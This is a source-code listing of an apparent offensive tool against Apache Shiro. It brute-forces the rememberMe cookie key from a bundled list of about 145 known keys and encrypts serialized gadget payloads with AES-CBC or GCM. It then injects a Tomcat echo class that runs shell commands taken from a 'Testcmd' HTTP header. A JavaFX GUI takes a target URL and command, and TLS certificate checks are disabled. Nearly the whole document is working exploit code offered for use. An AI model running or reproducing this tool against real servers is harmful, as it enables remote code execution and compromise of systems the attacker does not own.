 59 |                 "        } catch (NoSuchFieldException e) {\n" +
 60 |                 "            clazz = clazz.getSuperclass();\n" +
 61 |                 "        }\n" +
 62 |                 "    }\n" +
 63 |                 "    if (f == null) {\n" +
 64 |                 "        throw new NoSuchFieldException(s);\n" +
 65 |                 "    }\n" +
 66 |                 "    f.setAccessible(true);\n" +
 67 |                 "    return f.get(o);\n" +
 68 |                 "}\n", clazz));
 69 |         clazz.addConstructor(CtNewConstructor.make("public TomcatEcho() throws Exception {\n" +
 70 |                 "    Object o;\n" +
 71 |                 "    Object resp;\n" +
 72 |                 "    String s;\n" +
 73 |                 "    boolean done = false;\n" +
 74 |                 "    Thread[] ts = (Thread[]) getFV(Thread.currentThread().getThreadGroup(), \"threads\");\n" +
 75 |                 "    for (int i = 0; i < ts.length; i++) {\n" +
 76 |                 "        Thread t = ts[i];\n" +
 77 |                 "        if (t == null) {\n" +
 78 |                 "            continue;\n" +
 79 |                 "        }\n" +
 80 |                 "        s = t.getName();\n" +
 81 |                 "        if (!s.contains(\"exec\") && s.contains(\"http\")) {\n" +
 82 |                 "            o = getFV(t, \"target\");\n" +
 83 |                 "            if (!(o instanceof Runnable)) {\n" +
 84 |                 "                continue;\n" +
 85 |                 "            }\n" +
 86 |                 "\n" +
 87 |                 "            try {\n" +
 88 |                 "                o = getFV(getFV(getFV(o, \"this$0\"), \"handler\"), \"global\");\n" +
 89 |                 "            } catch (Exception e) {\n" +
 90 |                 "                continue;\n" +
 91 |                 "            }\n" +
 92 |                 "\n" +
 93 |                 "            java.util.List ps = (java.util.List) getFV(o, \"processors\");\n" +
 94 |                 "            for (int j = 0; j < ps.size(); j++) {\n" +
 95 |                 "                Object p = ps.get(j);\n" +
 96 |                 "                o = getFV(p, \"req\");\n" +
 97 |                 "                resp = o.getClass().getMethod(\"getResponse\", new Class[0]).invoke(o, new Object[0]);\n" +
 98 |                 "                s = (String) o.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(o, new Object[]{\"Testecho\"});\n" +
 99 |                 "                if (s != null && !s.isEmpty()) {\n" +
100 |                 "                    resp.getClass().getMethod(\"setStatus\", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});\n" +
101 |                 "                    resp.getClass().getMethod(\"addHeader\", new Class[]{String.class, String.class}).invoke(resp, new Object[]{\"Testecho\", s});\n" +
102 |                 "                    done = true;\n" +
103 |                 "                }\n" +
104 |                 "                s = (String) o.getClass().getMethod(\"getHeader\", new Class[]{String.class}).invoke(o, new Object[]{\"Testcmd\"});\n" +
105 |                 "                if (s != null && !s.isEmpty()) {\n" +
106 |                 "                    resp.getClass().getMethod(\"setStatus\", new Class[]{int.class}).invoke(resp, new Object[]{new Integer(200)});\n" +
107 |                 "                    String[] cmd = System.getProperty(\"os.name\").toLowerCase().contains(\"window\") ? new String[]{\"cmd.exe\", \"/c\", s} : new String[]{\"/bin/sh\", \"-c\", s};\n" +
108 |                 "                    writeBody(resp, new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter(\"\\\\A\").next().getBytes());\n" +
109 |                 "                    done = true;\n" +
110 |                 "                }\n" +
111 |                 "                if ((s == null || s.isEmpty()) && done) {\n" +
112 |                 "                    writeBody(resp, System.getProperties().toString().getBytes());\n" +
113 |                 "                }\n" +
114 |                 "\n" +
115 |                 "                if (done) {\n" +
116 |                 "                    break;\n" +
117 |                 "                }\n" +
118 |                 "            }\n" +
119 |                 "            if (done) {\n" +
120 |                 "                break;\n" +
121 |                 "            }\n" +
122 |                 "        }\n" +
123 |                 "    }\n" +
124 |                 "}", clazz));
125 | 
126 |         CtClass superC = pool.get(abstTranslet.getName());
127 |         clazz.setSuperclass(superC);
128 | 
129 |         final byte[] classBytes = clazz.toBytecode();
130 | 
131 |         // inject class bytes into instance
132 |         Reflections.setFieldValue(templates, "_bytecodes", new byte[][]{
133 |                 classBytes,
134 | //            classBytes, ClassFiles.classAsBytes(Foo.class)
135 |         });
136 | 
137 |         // required to make TemplatesImpl happy
138 |         Reflections.setFieldValue(templates, "_name", "Pwnr");
139 |         Reflections.setFieldValue(templates, "_tfactory", transFactory.newInstance());
140 |         return templates;
141 |     }
142 | 
143 | 
144 | 
145 | 
146 | }
147 | 


--------------------------------------------------------------------------------
/src/main/java/gadgets/util/Reflections.java:
--------------------------------------------------------------------------------
 1 | package gadgets.util;
 2 | 
 3 | import com.nqzero.permit.Permit;
 4 | import sun.reflect.ReflectionFactory;
 5 | 
 6 | import java.lang.reflect.AccessibleObject;
 7 | import java.lang.reflect.Constructor;
 8 | import java.lang.reflect.Field;
 9 | import java.lang.reflect.InvocationTargetException;
10 | 
11 | public class Reflections {
12 | 
13 |     public static void setAccessible(AccessibleObject member) {
14 |         // quiet runtime warnings from JDK9+
15 |         Permit.setAccessible(member);
16 |     }
17 | 
18 |     public static Field getField(final Class<?> clazz, final String fieldName) {
19 |         Field field = null;
20 |         try {
21 |             field = clazz.getDeclaredField(fieldName);
22 |             setAccessible(field);
23 |         }
24 |         catch (NoSuchFieldException ex) {
25 |             if (clazz.getSuperclass() != null)
26 |                 field = getField(clazz.getSuperclass(), fieldName);
27 |         }
28 |         return field;
29 |     }
30 | 
31 |     public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception {
32 |         final Field field = getField(obj.getClass(), fieldName);
33 |         field.set(obj, value);
34 |     }
35 | 
36 |     public static Object getFieldValue(final Object obj, final String fieldName) throws Exception {
37 |         final Field field = getField(obj.getClass(), fieldName);
38 |         return field.get(obj);
39 |     }
40 | 
41 |     public static Constructor<?> getFirstCtor(final String name) throws Exception {
42 |         final Constructor<?> ctor = Class.forName(name).getDeclaredConstructors()[0];
43 |         setAccessible(ctor);
44 |         return ctor;
45 |     }
46 | 
47 |     public static Object newInstance(String className, Object ... args) throws Exception {
48 |         return getFirstCtor(className).newInstance(args);
49 |     }
50 | 
51 |     public static <T> T createWithoutConstructor ( Class<T> classToInstantiate )
52 |             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
53 |         return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]);
54 |     }
55 | 
56 |     @SuppressWarnings ( {"unchecked"} )
57 |     public static <T> T createWithConstructor ( Class<T> classToInstantiate, Class<? super T> constructorClass, Class<?>[] consArgTypes, Object[] consArgs )
58 |             throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException {
59 |         Constructor<? super T> objCons = constructorClass.getDeclaredConstructor(consArgTypes);
60 |         setAccessible(objCons);
61 |         Constructor<?> sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons);
62 |         setAccessible(sc);
63 |         return (T)sc.newInstance(consArgs);
64 |     }
65 | 
66 | }
67 | 


--------------------------------------------------------------------------------
/src/main/java/gadgets/util/Serializer.java:
--------------------------------------------------------------------------------
 1 | package gadgets.util;
 2 | 
 3 | import org.apache.shiro.subject.SimplePrincipalCollection;
 4 | 
 5 | import java.io.ByteArrayOutputStream;
 6 | import java.io.IOException;
 7 | import java.io.ObjectOutputStream;
 8 | 
 9 | public class Serializer {
10 |     public static byte[] serialize(final Object object) throws IOException {
11 |         ByteArrayOutputStream barr = new ByteArrayOutputStream();
12 |         ObjectOutputStream obj = new ObjectOutputStream(barr);
13 |         obj.writeObject(object);
14 |         obj.close();
15 | 
16 | 
17 |         return barr.toByteArray();
18 | 
19 |     }
20 | }
21 | 


--------------------------------------------------------------------------------
/src/main/java/ui/MainController.java:
--------------------------------------------------------------------------------
 1 | package ui;
 2 | 
 3 | import core.GadgetsDetect;
 4 | import core.ShiroKeyDetect;
 5 | import entity.ControllersFactory;
 6 | import javafx.fxml.FXML;
 7 | 
 8 | import javafx.fxml.Initializable;
 9 | import javafx.scene.control.*;
10 | import javafx.scene.text.Text;
11 | 
12 | import java.net.URL;
13 | import java.util.HashMap;
14 | import java.util.Map;
15 | import java.util.ResourceBundle;
16 | 
17 | public class MainController implements Initializable {
18 | 
19 |     @FXML
20 |     private Button button;
21 | 
22 |     @FXML
23 |     private TextField attackUrl;
24 | 
25 |     @FXML
26 |     public TextArea result;
27 | 
28 |     @FXML
29 |     public TextField cmd;
30 | 
31 |     @Override
32 |     public void initialize(URL location, ResourceBundle resources) {
33 |         ControllersFactory.controllers.put(MainController.class.getSimpleName(),this);
34 |     }
35 | 
36 |     @FXML
37 |     public void execResult() throws Exception {
38 | 
39 |         //先判断是否为shiro框架，然后爆破shirokey
40 |         Thread thread = new Thread(()->{
41 |             String shirokey="";
42 |             String mode="";
43 |             String gadget = "";
44 |             ShiroKeyDetect shiroKeyDetect = new ShiroKeyDetect();
45 |             String targetUrl = attackUrl.getText();
46 |             String cmd1 = cmd.getText();
47 |             if(ShiroKeyDetect.isShiro(targetUrl)){
48 |                 try {
49 |                     Map<String,String> map = new HashMap<String,String>();
50 |                     map = shiroKeyDetect.ShiroKey(targetUrl);
51 |                     //用shirokey爆破gadgets链
52 |                     shirokey = map.get("shirokey");
53 |                     mode = map.get("mode");
54 |                     GadgetsDetect gadgetsDetect = new GadgetsDetect();
55 |                     gadget = gadgetsDetect.GadgetsBurp(targetUrl,shirokey,mode);
56 |                     gadgetsDetect.GadgetsExp(targetUrl,shirokey,mode,gadget,cmd1);
57 | 
58 |                 } catch (Exception e) {
59 |                     e.printStackTrace();
60 |                 }
61 | 
62 |             }else {
63 |                 result.appendText("未检测到shiro框架"+"\n");
64 |             }
65 | 
66 | 
67 |         });
68 |         thread.start();
69 |     }
70 | 
71 | }
72 | 


--------------------------------------------------------------------------------
/src/main/java/utils/HttpUtils.java:
--------------------------------------------------------------------------------
  1 | package utils;
  2 | 
  3 | import javax.net.ssl.*;
  4 | import java.io.BufferedReader;
  5 | import java.io.InputStream;
  6 | import java.io.InputStreamReader;
  7 | import java.io.OutputStream;
  8 | import java.net.HttpURLConnection;
  9 | import java.net.Proxy;
 10 | import java.net.URL;
 11 | import java.net.URLConnection;
 12 | import java.security.SecureRandom;
 13 | import java.util.List;
 14 | import java.util.Map;
 15 | 
 16 | public class HttpUtils {
 17 |     public boolean HttpShiroDetect(){
 18 |         return true;
 19 |     }
 20 |     public static HostnameVerifier allHostsValid = new HostnameVerifier() {
 21 |         public boolean verify(String hostname, SSLSession session) {
 22 |             return true;
 23 |         }
 24 |     };
 25 |     // Java get 发包,返回值为body内容
 26 |     public static String sendGet(String url, String rememberMe,String cmd) {
 27 |         String result = "";
 28 |         BufferedReader in = null;
 29 |         URLConnection httpUrlConn = null;
 30 |         HttpsURLConnection hsc = null;
 31 |         HttpURLConnection hc = null;
 32 |         InputStream inputStream = null;
 33 |         InputStreamReader isr = null;
 34 |         Object br = null;
 35 |         try {
 36 |             String urlNameString = url;
 37 |             URL realUrl = new URL(urlNameString);
 38 |             if (url.startsWith("https")) {
 39 |                 SSLContext sslContext = SSLContext.getInstance("SSL");
 40 |                 TrustManager[] tm = new TrustManager[]{new MyCert()};
 41 |                 sslContext.init(null, tm, new SecureRandom());
 42 |                 SSLSocketFactory ssf = sslContext.getSocketFactory();
 43 |                 hsc = (HttpsURLConnection)realUrl.openConnection();
 44 | 
 45 |                 hsc.setSSLSocketFactory(ssf);
 46 |                 hsc.setHostnameVerifier(allHostsValid);
 47 |                 httpUrlConn = hsc;
 48 |             }else {
 49 |                 hc = (HttpURLConnection)realUrl.openConnection();
 50 |                 hc.setRequestMethod("GET");
 51 |                 hc.setInstanceFollowRedirects(false);
 52 |                 System.out.println(hc.getRequestProperties());
 53 |                 httpUrlConn = hc;
 54 |             }
 55 |             // 打开和URL之间的连接
 56 |             URLConnection connection = realUrl.openConnection();
 57 |             // 设置通用的请求属性
 58 |             httpUrlConn.setRequestProperty("accept", "*/*");
 59 |             httpUrlConn.setRequestProperty("connection", "Keep-Alive");
 60 |             httpUrlConn.setRequestProperty("user-agent",
 61 |                     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
 62 |             httpUrlConn.setRequestProperty("Cookie","rememberMe="+rememberMe);
 63 |             httpUrlConn.setRequestProperty("Testcmd",cmd);
 64 |             // 建立实际的连接
 65 |             httpUrlConn.connect();
 66 |             // 获取所有响应头字段
 67 |             Map<String, List<String>> map = httpUrlConn.getHeaderFields();
 68 |             // 遍历所有的响应头字段
 69 |             for (String key : map.keySet()) {
 70 |                 System.out.println(key + "--->" + map.get(key));
 71 |             }
 72 |             // 定义 BufferedReader输入流来读取URL的响应
 73 |             in = new BufferedReader(new InputStreamReader(
 74 |                     httpUrlConn.getInputStream()));
 75 |             String line;
 76 |             while ((line = in.readLine()) != null) {
 77 |                 result += line;
 78 |             }
 79 | //            StringBuffer sb = new StringBuffer();
 80 | //            int BUFFER_SIZE=1024;
 81 | //            char[] buffer = new char[BUFFER_SIZE]; // or some other size,
 82 | //            int charsRead = 0;
 83 | //            while ( (charsRead  = in.read(buffer, 0, BUFFER_SIZE)) != -1) {
 84 | //                sb.append(buffer, 0, charsRead);
 85 | //            }
 86 | //            result = new String(buffer);
 87 |         } catch (Exception e) {
 88 |             System.out.println("发送GET请求出现异常！" + e);
 89 |             e.printStackTrace();
 90 |         }
 91 |         // 使用finally块来关闭输入流
 92 |         finally {
 93 |             try {
 94 |                 if (in != null) {
 95 |                     in.close();
 96 |                 }
 97 |             } catch (Exception e2) {
 98 |                 e2.printStackTrace();
 99 |             }
100 |         }
101 |         return result;
102 |     }
103 |     // Java get 发包,返回值为Header内容
104 |     public static String getHeader(String url, String rememberMe) {
105 |         String result = "";
106 |         BufferedReader in = null;
107 | 
108 |         URLConnection httpUrlConn = null;
109 |         HttpsURLConnection hsc = null;
110 |         HttpURLConnection hc = null;
111 |         InputStream inputStream = null;
112 |         InputStreamReader isr = null;
113 |         Object br = null;
114 |         try {
115 |             URL realUrl = new URL(url);
116 |             if (url.startsWith("https")) {
117 |                 SSLContext sslContext = SSLContext.getInstance("SSL");
118 |                 TrustManager[] tm = new TrustManager[]{new MyCert()};
119 |                 sslContext.init(null, tm, new SecureRandom());
120 |                 SSLSocketFactory ssf = sslContext.getSocketFactory();
121 |                 hsc = (HttpsURLConnection)realUrl.openConnection();
122 | 
123 |                 hsc.setSSLSocketFactory(ssf);
124 |                 hsc.setHostnameVerifier(allHostsValid);
125 |                 httpUrlConn = hsc;
126 |             }else {
127 |                 hc = (HttpURLConnection)realUrl.openConnection();
128 |                 hc.setRequestMethod("GET");
129 |                 hc.setInstanceFollowRedirects(false);
130 |                 System.out.println(hc.getRequestProperties());
131 |                 httpUrlConn = hc;
132 |             }
133 |             // 打开和URL之间的连接
134 |             URLConnection connection = realUrl.openConnection();
135 |             // 设置通用的请求属性
136 |             httpUrlConn.setRequestProperty("accept", "*/*");
137 |             httpUrlConn.setRequestProperty("connection", "Keep-Alive");
138 |             httpUrlConn.setRequestProperty("user-agent",
139 |                     "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
140 |             httpUrlConn.setRequestProperty("Cookie","rememberMe="+rememberMe);
141 |             httpUrlConn.setRequestProperty("Testecho","23f20bfc119b58355179e1f33722f14c");
142 |             // 建立实际的连接
143 |             httpUrlConn.connect();
144 |             // 获取所有响应头字段
145 |             Map<String, List<String>> map = httpUrlConn.getHeaderFields();
146 |             // 遍历所有的响应头字段
147 |             String line;
148 |             for (String key : map.keySet()) {
149 |                 result += key + "--->" + map.get(key);
150 |             }
151 |             return result;
152 |         } catch (Exception e) {
153 |             System.out.println("发送GET请求出现异常！" + e);
154 |             e.printStackTrace();
155 |         }
156 |         // 使用finally块来关闭输入流
157 |         finally {
158 |             try {
159 |                 if (in != null) {
160 |                     in.close();
161 |                 }
162 |             } catch (Exception e2) {
163 |                 e2.printStackTrace();
164 |             }
165 |         }
166 |         return result;
167 |     }
168 | }
169 | 


--------------------------------------------------------------------------------
/src/main/java/utils/MyCert.java:
--------------------------------------------------------------------------------
 1 | package utils;
 2 | 
 3 | 
 4 | import java.security.cert.CertificateException;
 5 | import java.security.cert.X509Certificate;
 6 | import javax.net.ssl.X509TrustManager;
 7 | 
 8 | public class MyCert implements X509TrustManager {
 9 |     public MyCert() {
10 |     }
11 | 
12 |     public void checkClientTrusted(X509Certificate[] chain, String authType) throws CertificateException {
13 |     }
14 | 
15 |     public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException {
16 |     }
17 | 
18 |     public X509Certificate[] getAcceptedIssuers() {
19 |         return null;
20 |     }
21 | }
22 | 


--------------------------------------------------------------------------------
/src/main/java/utils/createAESCBCCipher.java:
--------------------------------------------------------------------------------
 1 | package utils;
 2 | 
 3 | import gadgets.util.Serializer;
 4 | import org.apache.shiro.codec.Base64;
 5 | 
 6 | import javax.crypto.Cipher;
 7 | import javax.crypto.spec.IvParameterSpec;
 8 | import javax.crypto.spec.SecretKeySpec;
 9 | import java.security.SecureRandom;
10 | 
11 | public class createAESCBCCipher {
12 |     //实现AES中的CBC加密
13 |     public static String encrypt(String Shirokey,Object object) throws Exception {
14 |         byte[] payloads = Serializer.serialize(object);
15 |         byte[] key = java.util.Base64.getDecoder().decode(Shirokey);
16 | 
17 | //        byte[] raw = sKey.getBytes("utf-8");
18 |         int ivSize = 16;
19 |         byte[] iv = new byte[ivSize];
20 |         SecureRandom random = new SecureRandom();
21 |         random.nextBytes(iv);
22 |         IvParameterSpec ivParameterSpec = new IvParameterSpec(iv);
23 |         SecretKeySpec secretKeySpec = new SecretKeySpec(key, "AES");
24 |         Cipher cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
25 |         cipher.init(1, secretKeySpec, ivParameterSpec);
26 |         byte[] encrypted = cipher.doFinal(payloads);
27 |         byte[] encryptedIvandtext = new byte[ivSize + encrypted.length];
28 |         System.arraycopy(iv, 0, encryptedIvandtext, 0, ivSize);
29 |         System.arraycopy(encrypted, 0, encryptedIvandtext, ivSize, encrypted.length);
30 | //        return new BASE64Encoder().encode(encrypted);//此处使用BASE64做转码功能，同时能起到2次加密的作用。
31 |         String b64Payload = Base64.encodeToString(encryptedIvandtext);
32 | 
33 | 
34 | //        System.out.println(b64Payload);
35 |         return b64Payload;
36 |     }
37 | 
38 | }
39 | 


--------------------------------------------------------------------------------
/src/main/java/utils/createAESGCMCipher.java:
--------------------------------------------------------------------------------
 1 | package utils;
 2 | 
 3 | import gadgets.util.Serializer;
 4 | import org.apache.shiro.codec.Base64;
 5 | 
 6 | import javax.crypto.Cipher;
 7 | import javax.crypto.spec.GCMParameterSpec;
 8 | import javax.crypto.spec.IvParameterSpec;
 9 | import javax.crypto.spec.SecretKeySpec;
10 | import java.security.SecureRandom;
11 | 
12 | public class createAESGCMCipher {
13 |     //实现AES中的GCM加密 shiro1.4.2版本更换为了AES-GCM加密方式
14 |     public static String encrypt(String Shirokey,Object object) throws Exception {
15 |         byte[] payloads = Serializer.serialize(object);
16 |         byte[] key = java.util.Base64.getDecoder().decode(Shirokey);
17 | 
18 | 
19 | 
20 |         int ivSize = 16;
21 |         byte[] iv = new byte[ivSize];
22 |         SecureRandom random = new SecureRandom();
23 |         random.nextBytes(iv);
24 |         GCMParameterSpec ivParameterSpec = new GCMParameterSpec(128,iv);
25 |         SecretKeySpec secretKeySpec = new SecretKeySpec(key, "AES");
26 |         Cipher cipher = Cipher.getInstance("AES/GCM/NoPadding");
27 |         cipher.init(1, secretKeySpec, ivParameterSpec);
28 |         byte[] encrypted = cipher.doFinal(payloads);
29 |         byte[] encryptedIvandtext = new byte[ivSize + encrypted.length];
30 |         System.arraycopy(iv, 0, encryptedIvandtext, 0, ivSize);
31 |         System.arraycopy(encrypted, 0, encryptedIvandtext, ivSize, encrypted.length);
32 | //        return new BASE64Encoder().encode(encrypted);//此处使用BASE64做转码功能，同时能起到2次加密的作用。
33 |         String b64Payload = Base64.encodeToString(encryptedIvandtext);
34 | 
35 | 
36 | //        System.out.println(b64Payload);
37 |         return b64Payload;
38 |     }
39 | 
40 | }
41 | 


--------------------------------------------------------------------------------
/src/main/resources/Main.fxml:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="UTF-8"?>
 2 | 
 3 | <?import javafx.scene.control.Button?>
 4 | <?import javafx.scene.control.TextArea?>
 5 | <?import javafx.scene.control.TextField?>
 6 | <?import javafx.scene.layout.AnchorPane?>
 7 | <?import javafx.scene.text.Text?>
 8 | 
 9 | <AnchorPane maxHeight="-Infinity" maxWidth="-Infinity" minHeight="-Infinity" minWidth="-Infinity" prefHeight="522.0" prefWidth="810.0" xmlns="http://javafx.com/javafx/17" xmlns:fx="http://javafx.com/fxml/1" fx:controller="ui.MainController">
10 |    <children>
11 |       <Button fx:id="button" layoutX="393.0" layoutY="462.0" mnemonicParsing="false" onAction="#execResult" text="Run" />
12 |       <Text fx:id="text_1" layoutX="98.0" layoutY="71.0" strokeType="OUTSIDE" strokeWidth="0.0" text="URL" />
13 |       <Text layoutX="92.0" layoutY="129.0" strokeType="OUTSIDE" strokeWidth="0.0" text="Result" />
14 |       <TextArea fx:id="result" layoutX="176.0" layoutY="117.0" prefHeight="313.0" prefWidth="540.0" />
15 |       <TextField fx:id="attackUrl" layoutX="176.0" layoutY="55.0" prefHeight="23.0" prefWidth="288.0" />
16 |       <TextField fx:id="cmd" layoutX="555.0" layoutY="55.0" prefHeight="23.0" prefWidth="156.0" text="whoami" />
17 |       <Text layoutX="494.0" layoutY="71.0" strokeType="OUTSIDE" strokeWidth="0.0" text="CMD" />
18 |    </children>
19 | </AnchorPane>
20 | 


--------------------------------------------------------------------------------
/src/main/resources/application.css:
--------------------------------------------------------------------------------
1 | /* JavaFX CSS - Leave this comment until you have at least create one rule which uses -fx-Property */
2 | 
3 | .root{
4 | 
5 |     -fx-font-size: 1.2em;
6 |     -fx-font-family: "Helvetica, Arial, sans-serif";
7 | 
8 | }


--------------------------------------------------------------------------------
/src/main/resources/shirokey.txt:
--------------------------------------------------------------------------------
  1 | kPH+bIxk5D2deZiIxcaaaA==
  2 | 2AvVhdsgUs0FSA3SDFAdag==
  3 | 3AvVhmFLUs0KTA3Kprsdag==
  4 | 4AvVhmFLUs0KTA3Kprsdag==
  5 | 5aaC5qKm5oqA5pyvAAAAAA==
  6 | 6ZmI6I2j5Y+R5aSn5ZOlAA==
  7 | bWljcm9zAAAAAAAAAAAAAA==
  8 | wGiHplamyXlVB11UXWol8g==
  9 | Z3VucwAAAAAAAAAAAAAAAA==
 10 | MTIzNDU2Nzg5MGFiY2RlZg==
 11 | zSyK5Kp6PZAAjlT+eeNMlg==
 12 | U3ByaW5nQmxhZGUAAAAAAA==
 13 | 5AvVhmFLUs0KTA3Kprsdag==
 14 | bXdrXl9eNjY2KjA3Z2otPQ==
 15 | fCq+/xW488hMTCD+cmJ3aQ==
 16 | 1QWLxg+NYmxraMoxAXu/Iw==
 17 | ZUdsaGJuSmxibVI2ZHc9PQ==
 18 | L7RioUULEFhRyxM7a2R/Yg==
 19 | r0e3c16IdVkouZgk1TKVMg==
 20 | bWluZS1hc3NldC1rZXk6QQ==
 21 | a2VlcE9uR29pbmdBbmRGaQ==
 22 | WcfHGU25gNnTxTlmJMeSpw==
 23 | ZAvph3dsQs0FSL3SDFAdag==
 24 | tiVV6g3uZBGfgshesAQbjA==
 25 | cmVtZW1iZXJNZQAAAAAAAA==
 26 | ZnJlc2h6Y24xMjM0NTY3OA==
 27 | RVZBTk5JR0hUTFlfV0FPVQ==
 28 | WkhBTkdYSUFPSEVJX0NBVA==
 29 | GsHaWo4m1eNbE0kNSMULhg==
 30 | l8cc6d2xpkT1yFtLIcLHCg==
 31 | KU471rVNQ6k7PQL4SqxgJg==
 32 | 0AvVhmFLUs0KTA3Kprsdag==
 33 | 1AvVhdsgUs0FSA3SDFAdag==
 34 | 25BsmdYwjnfcWmnhAciDDg==
 35 | 3JvYhmBLUs0ETA5Kprsdag==
 36 | 6AvVhmFLUs0KTA3Kprsdag==
 37 | 6NfXkC7YVCV5DASIrEm1Rg==
 38 | 7AvVhmFLUs0KTA3Kprsdag==
 39 | 8AvVhmFLUs0KTA3Kprsdag==
 40 | 8BvVhmFLUs0KTA3Kprsdag==
 41 | 9AvVhmFLUs0KTA3Kprsdag==
 42 | OUHYQzxQ/W9e/UjiAGu6rg==
 43 | a3dvbmcAAAAAAAAAAAAAAA==
 44 | aU1pcmFjbGVpTWlyYWNsZQ==
 45 | bXRvbnMAAAAAAAAAAAAAAA==
 46 | OY//C4rhfwNxCQAQCrQQ1Q==
 47 | 5J7bIJIV0LQSN3c9LPitBQ==
 48 | f/SY5TIve5WWzT4aQlABJA==
 49 | bya2HkYo57u6fWh5theAWw==
 50 | WuB+y2gcHRnY2Lg9+Aqmqg==
 51 | 3qDVdLawoIr1xFd6ietnwg==
 52 | YI1+nBV//m7ELrIyDHm6DQ==
 53 | 6Zm+6I2j5Y+R5aS+5ZOlAA==
 54 | 2A2V+RFLUs+eTA3Kpr+dag==
 55 | 6ZmI6I2j3Y+R1aSn5BOlAA==
 56 | SkZpbmFsQmxhZGUAAAAAAA==
 57 | 2cVtiE83c4lIrELJwKGJUw==
 58 | fsHspZw/92PrS3XrPW+vxw==
 59 | XTx6CKLo/SdSgub+OPHSrw==
 60 | sHdIjUN6tzhl8xZMG3ULCQ==
 61 | O4pdf+7e+mZe8NyxMTPJmQ==
 62 | HWrBltGvEZc14h9VpMvZWw==
 63 | rPNqM6uKFCyaL10AK51UkQ==
 64 | Y1JxNSPXVwMkyvES/kJGeQ==
 65 | lT2UvDUmQwewm6mMoiw4Ig==
 66 | MPdCMZ9urzEA50JDlDYYDg==
 67 | xVmmoltfpb8tTceuT5R7Bw==
 68 | c+3hFGPjbgzGdrC+MHgoRQ==
 69 | ClLk69oNcA3m+s0jIMIkpg==
 70 | Bf7MfkNR0axGGptozrebag==
 71 | 1tC/xrDYs8ey+sa3emtiYw==
 72 | ZmFsYWRvLnh5ei5zaGlybw==
 73 | cGhyYWNrY3RmREUhfiMkZA==
 74 | IduElDUpDDXE677ZkhhKnQ==
 75 | yeAAo1E8BOeAYfBlm4NG9Q==
 76 | cGljYXMAAAAAAAAAAAAAAA==
 77 | 2itfW92XazYRi5ltW0M2yA==
 78 | XgGkgqGqYrix9lI6vxcrRw==
 79 | ertVhmFLUs0KTA3Kprsdag==
 80 | 5AvVhmFLUS0ATA4Kprsdag==
 81 | s0KTA3mFLUprK4AvVhsdag==
 82 | hBlzKg78ajaZuTE0VLzDDg==
 83 | 9FvVhtFLUs0KnA3Kprsdyg==
 84 | d2ViUmVtZW1iZXJNZUtleQ==
 85 | yNeUgSzL/CfiWw1GALg6Ag==
 86 | NGk/3cQ6F5/UNPRh8LpMIg==
 87 | 4BvVhmFLUs0KTA3Kprsdag==
 88 | MzVeSkYyWTI2OFVLZjRzZg==
 89 | empodDEyMwAAAAAAAAAAAA==
 90 | A7UzJgh1+EWj5oBFi+mSgw==
 91 | c2hpcm9fYmF0aXMzMgAAAA==
 92 | i45FVt72K2kLgvFrJtoZRw==
 93 | U3BAbW5nQmxhZGUAAAAAAA==
 94 | Jt3C93kMR9D5e8QzwfsiMw==
 95 | MTIzNDU2NzgxMjM0NTY3OA==
 96 | vXP33AonIp9bFwGl7aT7rA==
 97 | V2hhdCBUaGUgSGVsbAAAAA==
 98 | Q01TX0JGTFlLRVlfMjAxOQ==
 99 | Is9zJ3pzNh2cgTHB4ua3+Q==
100 | NsZXjXVklWPZwOfkvk6kUA==
101 | GAevYnznvgNCURavBhCr1w==
102 | 66v1O8keKNV3TTcGPK1wzg==
103 | SDKOLKn2J1j/2BHjeZwAoQ==
104 | kPH+bIxk5D2deZiIxcabaA==
105 | kPH+bIxk5D2deZiIxcacaA==
106 | 3AvVhdAgUs0FSA4SDFAdBg==
107 | 4AvVhdsgUs0F563SDFAdag==
108 | FL9HL9Yu5bVUJ0PDU1ySvg==
109 | 5RC7uBZLkByfFfJm22q/Zw==
110 | eXNmAAAAAAAAAAAAAAAAAA==
111 | fdCEiK9YvLC668sS43CJ6A==
112 | FJoQCiz0z5XWz2N2LyxNww==
113 | HeUZ/LvgkO7nsa18ZyVxWQ==
114 | HoTP07fJPKIRLOWoVXmv+Q==
115 | iycgIIyCatQofd0XXxbzEg==
116 | m0/5ZZ9L4jjQXn7MREr/bw==
117 | NoIw91X9GSiCrLCF03ZGZw==
118 | oPH+bIxk5E2enZiIxcqaaA==
119 | QAk0rp8sG0uJC4Ke2baYNA==
120 | Rb5RN+LofDWJlzWAwsXzxg==
121 | s2SE9y32PvLeYo+VGFpcKA==
122 | SrpFBcVD89eTQ2icOD0TMg==
123 | U0hGX2d1bnMAAAAAAAAAAA==
124 | Us0KvVhTeasAm43KFLAeng==
125 | Ymx1ZXdoYWxlAAAAAAAAAA==
126 | YWJjZGRjYmFhYmNkZGNiYQ==
127 | zIiHplamyXlVB11UXWol8g==
128 | ZjQyMTJiNTJhZGZmYjFjMQ==
129 | HOlg7NHb9potm0n5s4ic0Q==
130 | 2AvVhdsgUs0FSA3SaFAdfg==
131 | 4rvVhmFLUs0KAT3Kprsdag==
132 | AF05JAuyuEB1ouJQ9Y9Phg==
133 | UGlzMjAxNiVLeUVlXiEjLw==
134 | 2AvVhdsgERdsSA3SDFAdag==
135 | QF5HMyZAWDZYRyFnSGhTdQ==
136 | 8AvVhdsgUs0FSA3SDFAdag==
137 | 4AvVhmFLUs5KTA1Kprsdag==
138 | 4WCZSJyqdUQsije93aQIRg==
139 | 3rvVhmFLUs0KAT3Kprsdag==
140 | b2EAAAAAAAAAAAAAAAAAAA==
141 | 3AvVhMFLIs0KTA3Kprsdag==
142 | 4AvVhm2LUs0KTA3Kprsdag==
143 | kPv59vyqzj00x11LXJZTjJ2UHW48jzHN
144 | 2AvVCXsxUs0FSA7SYFjdQg==
145 | Cj6LnKZNLEowAZrdqyH/Ew==
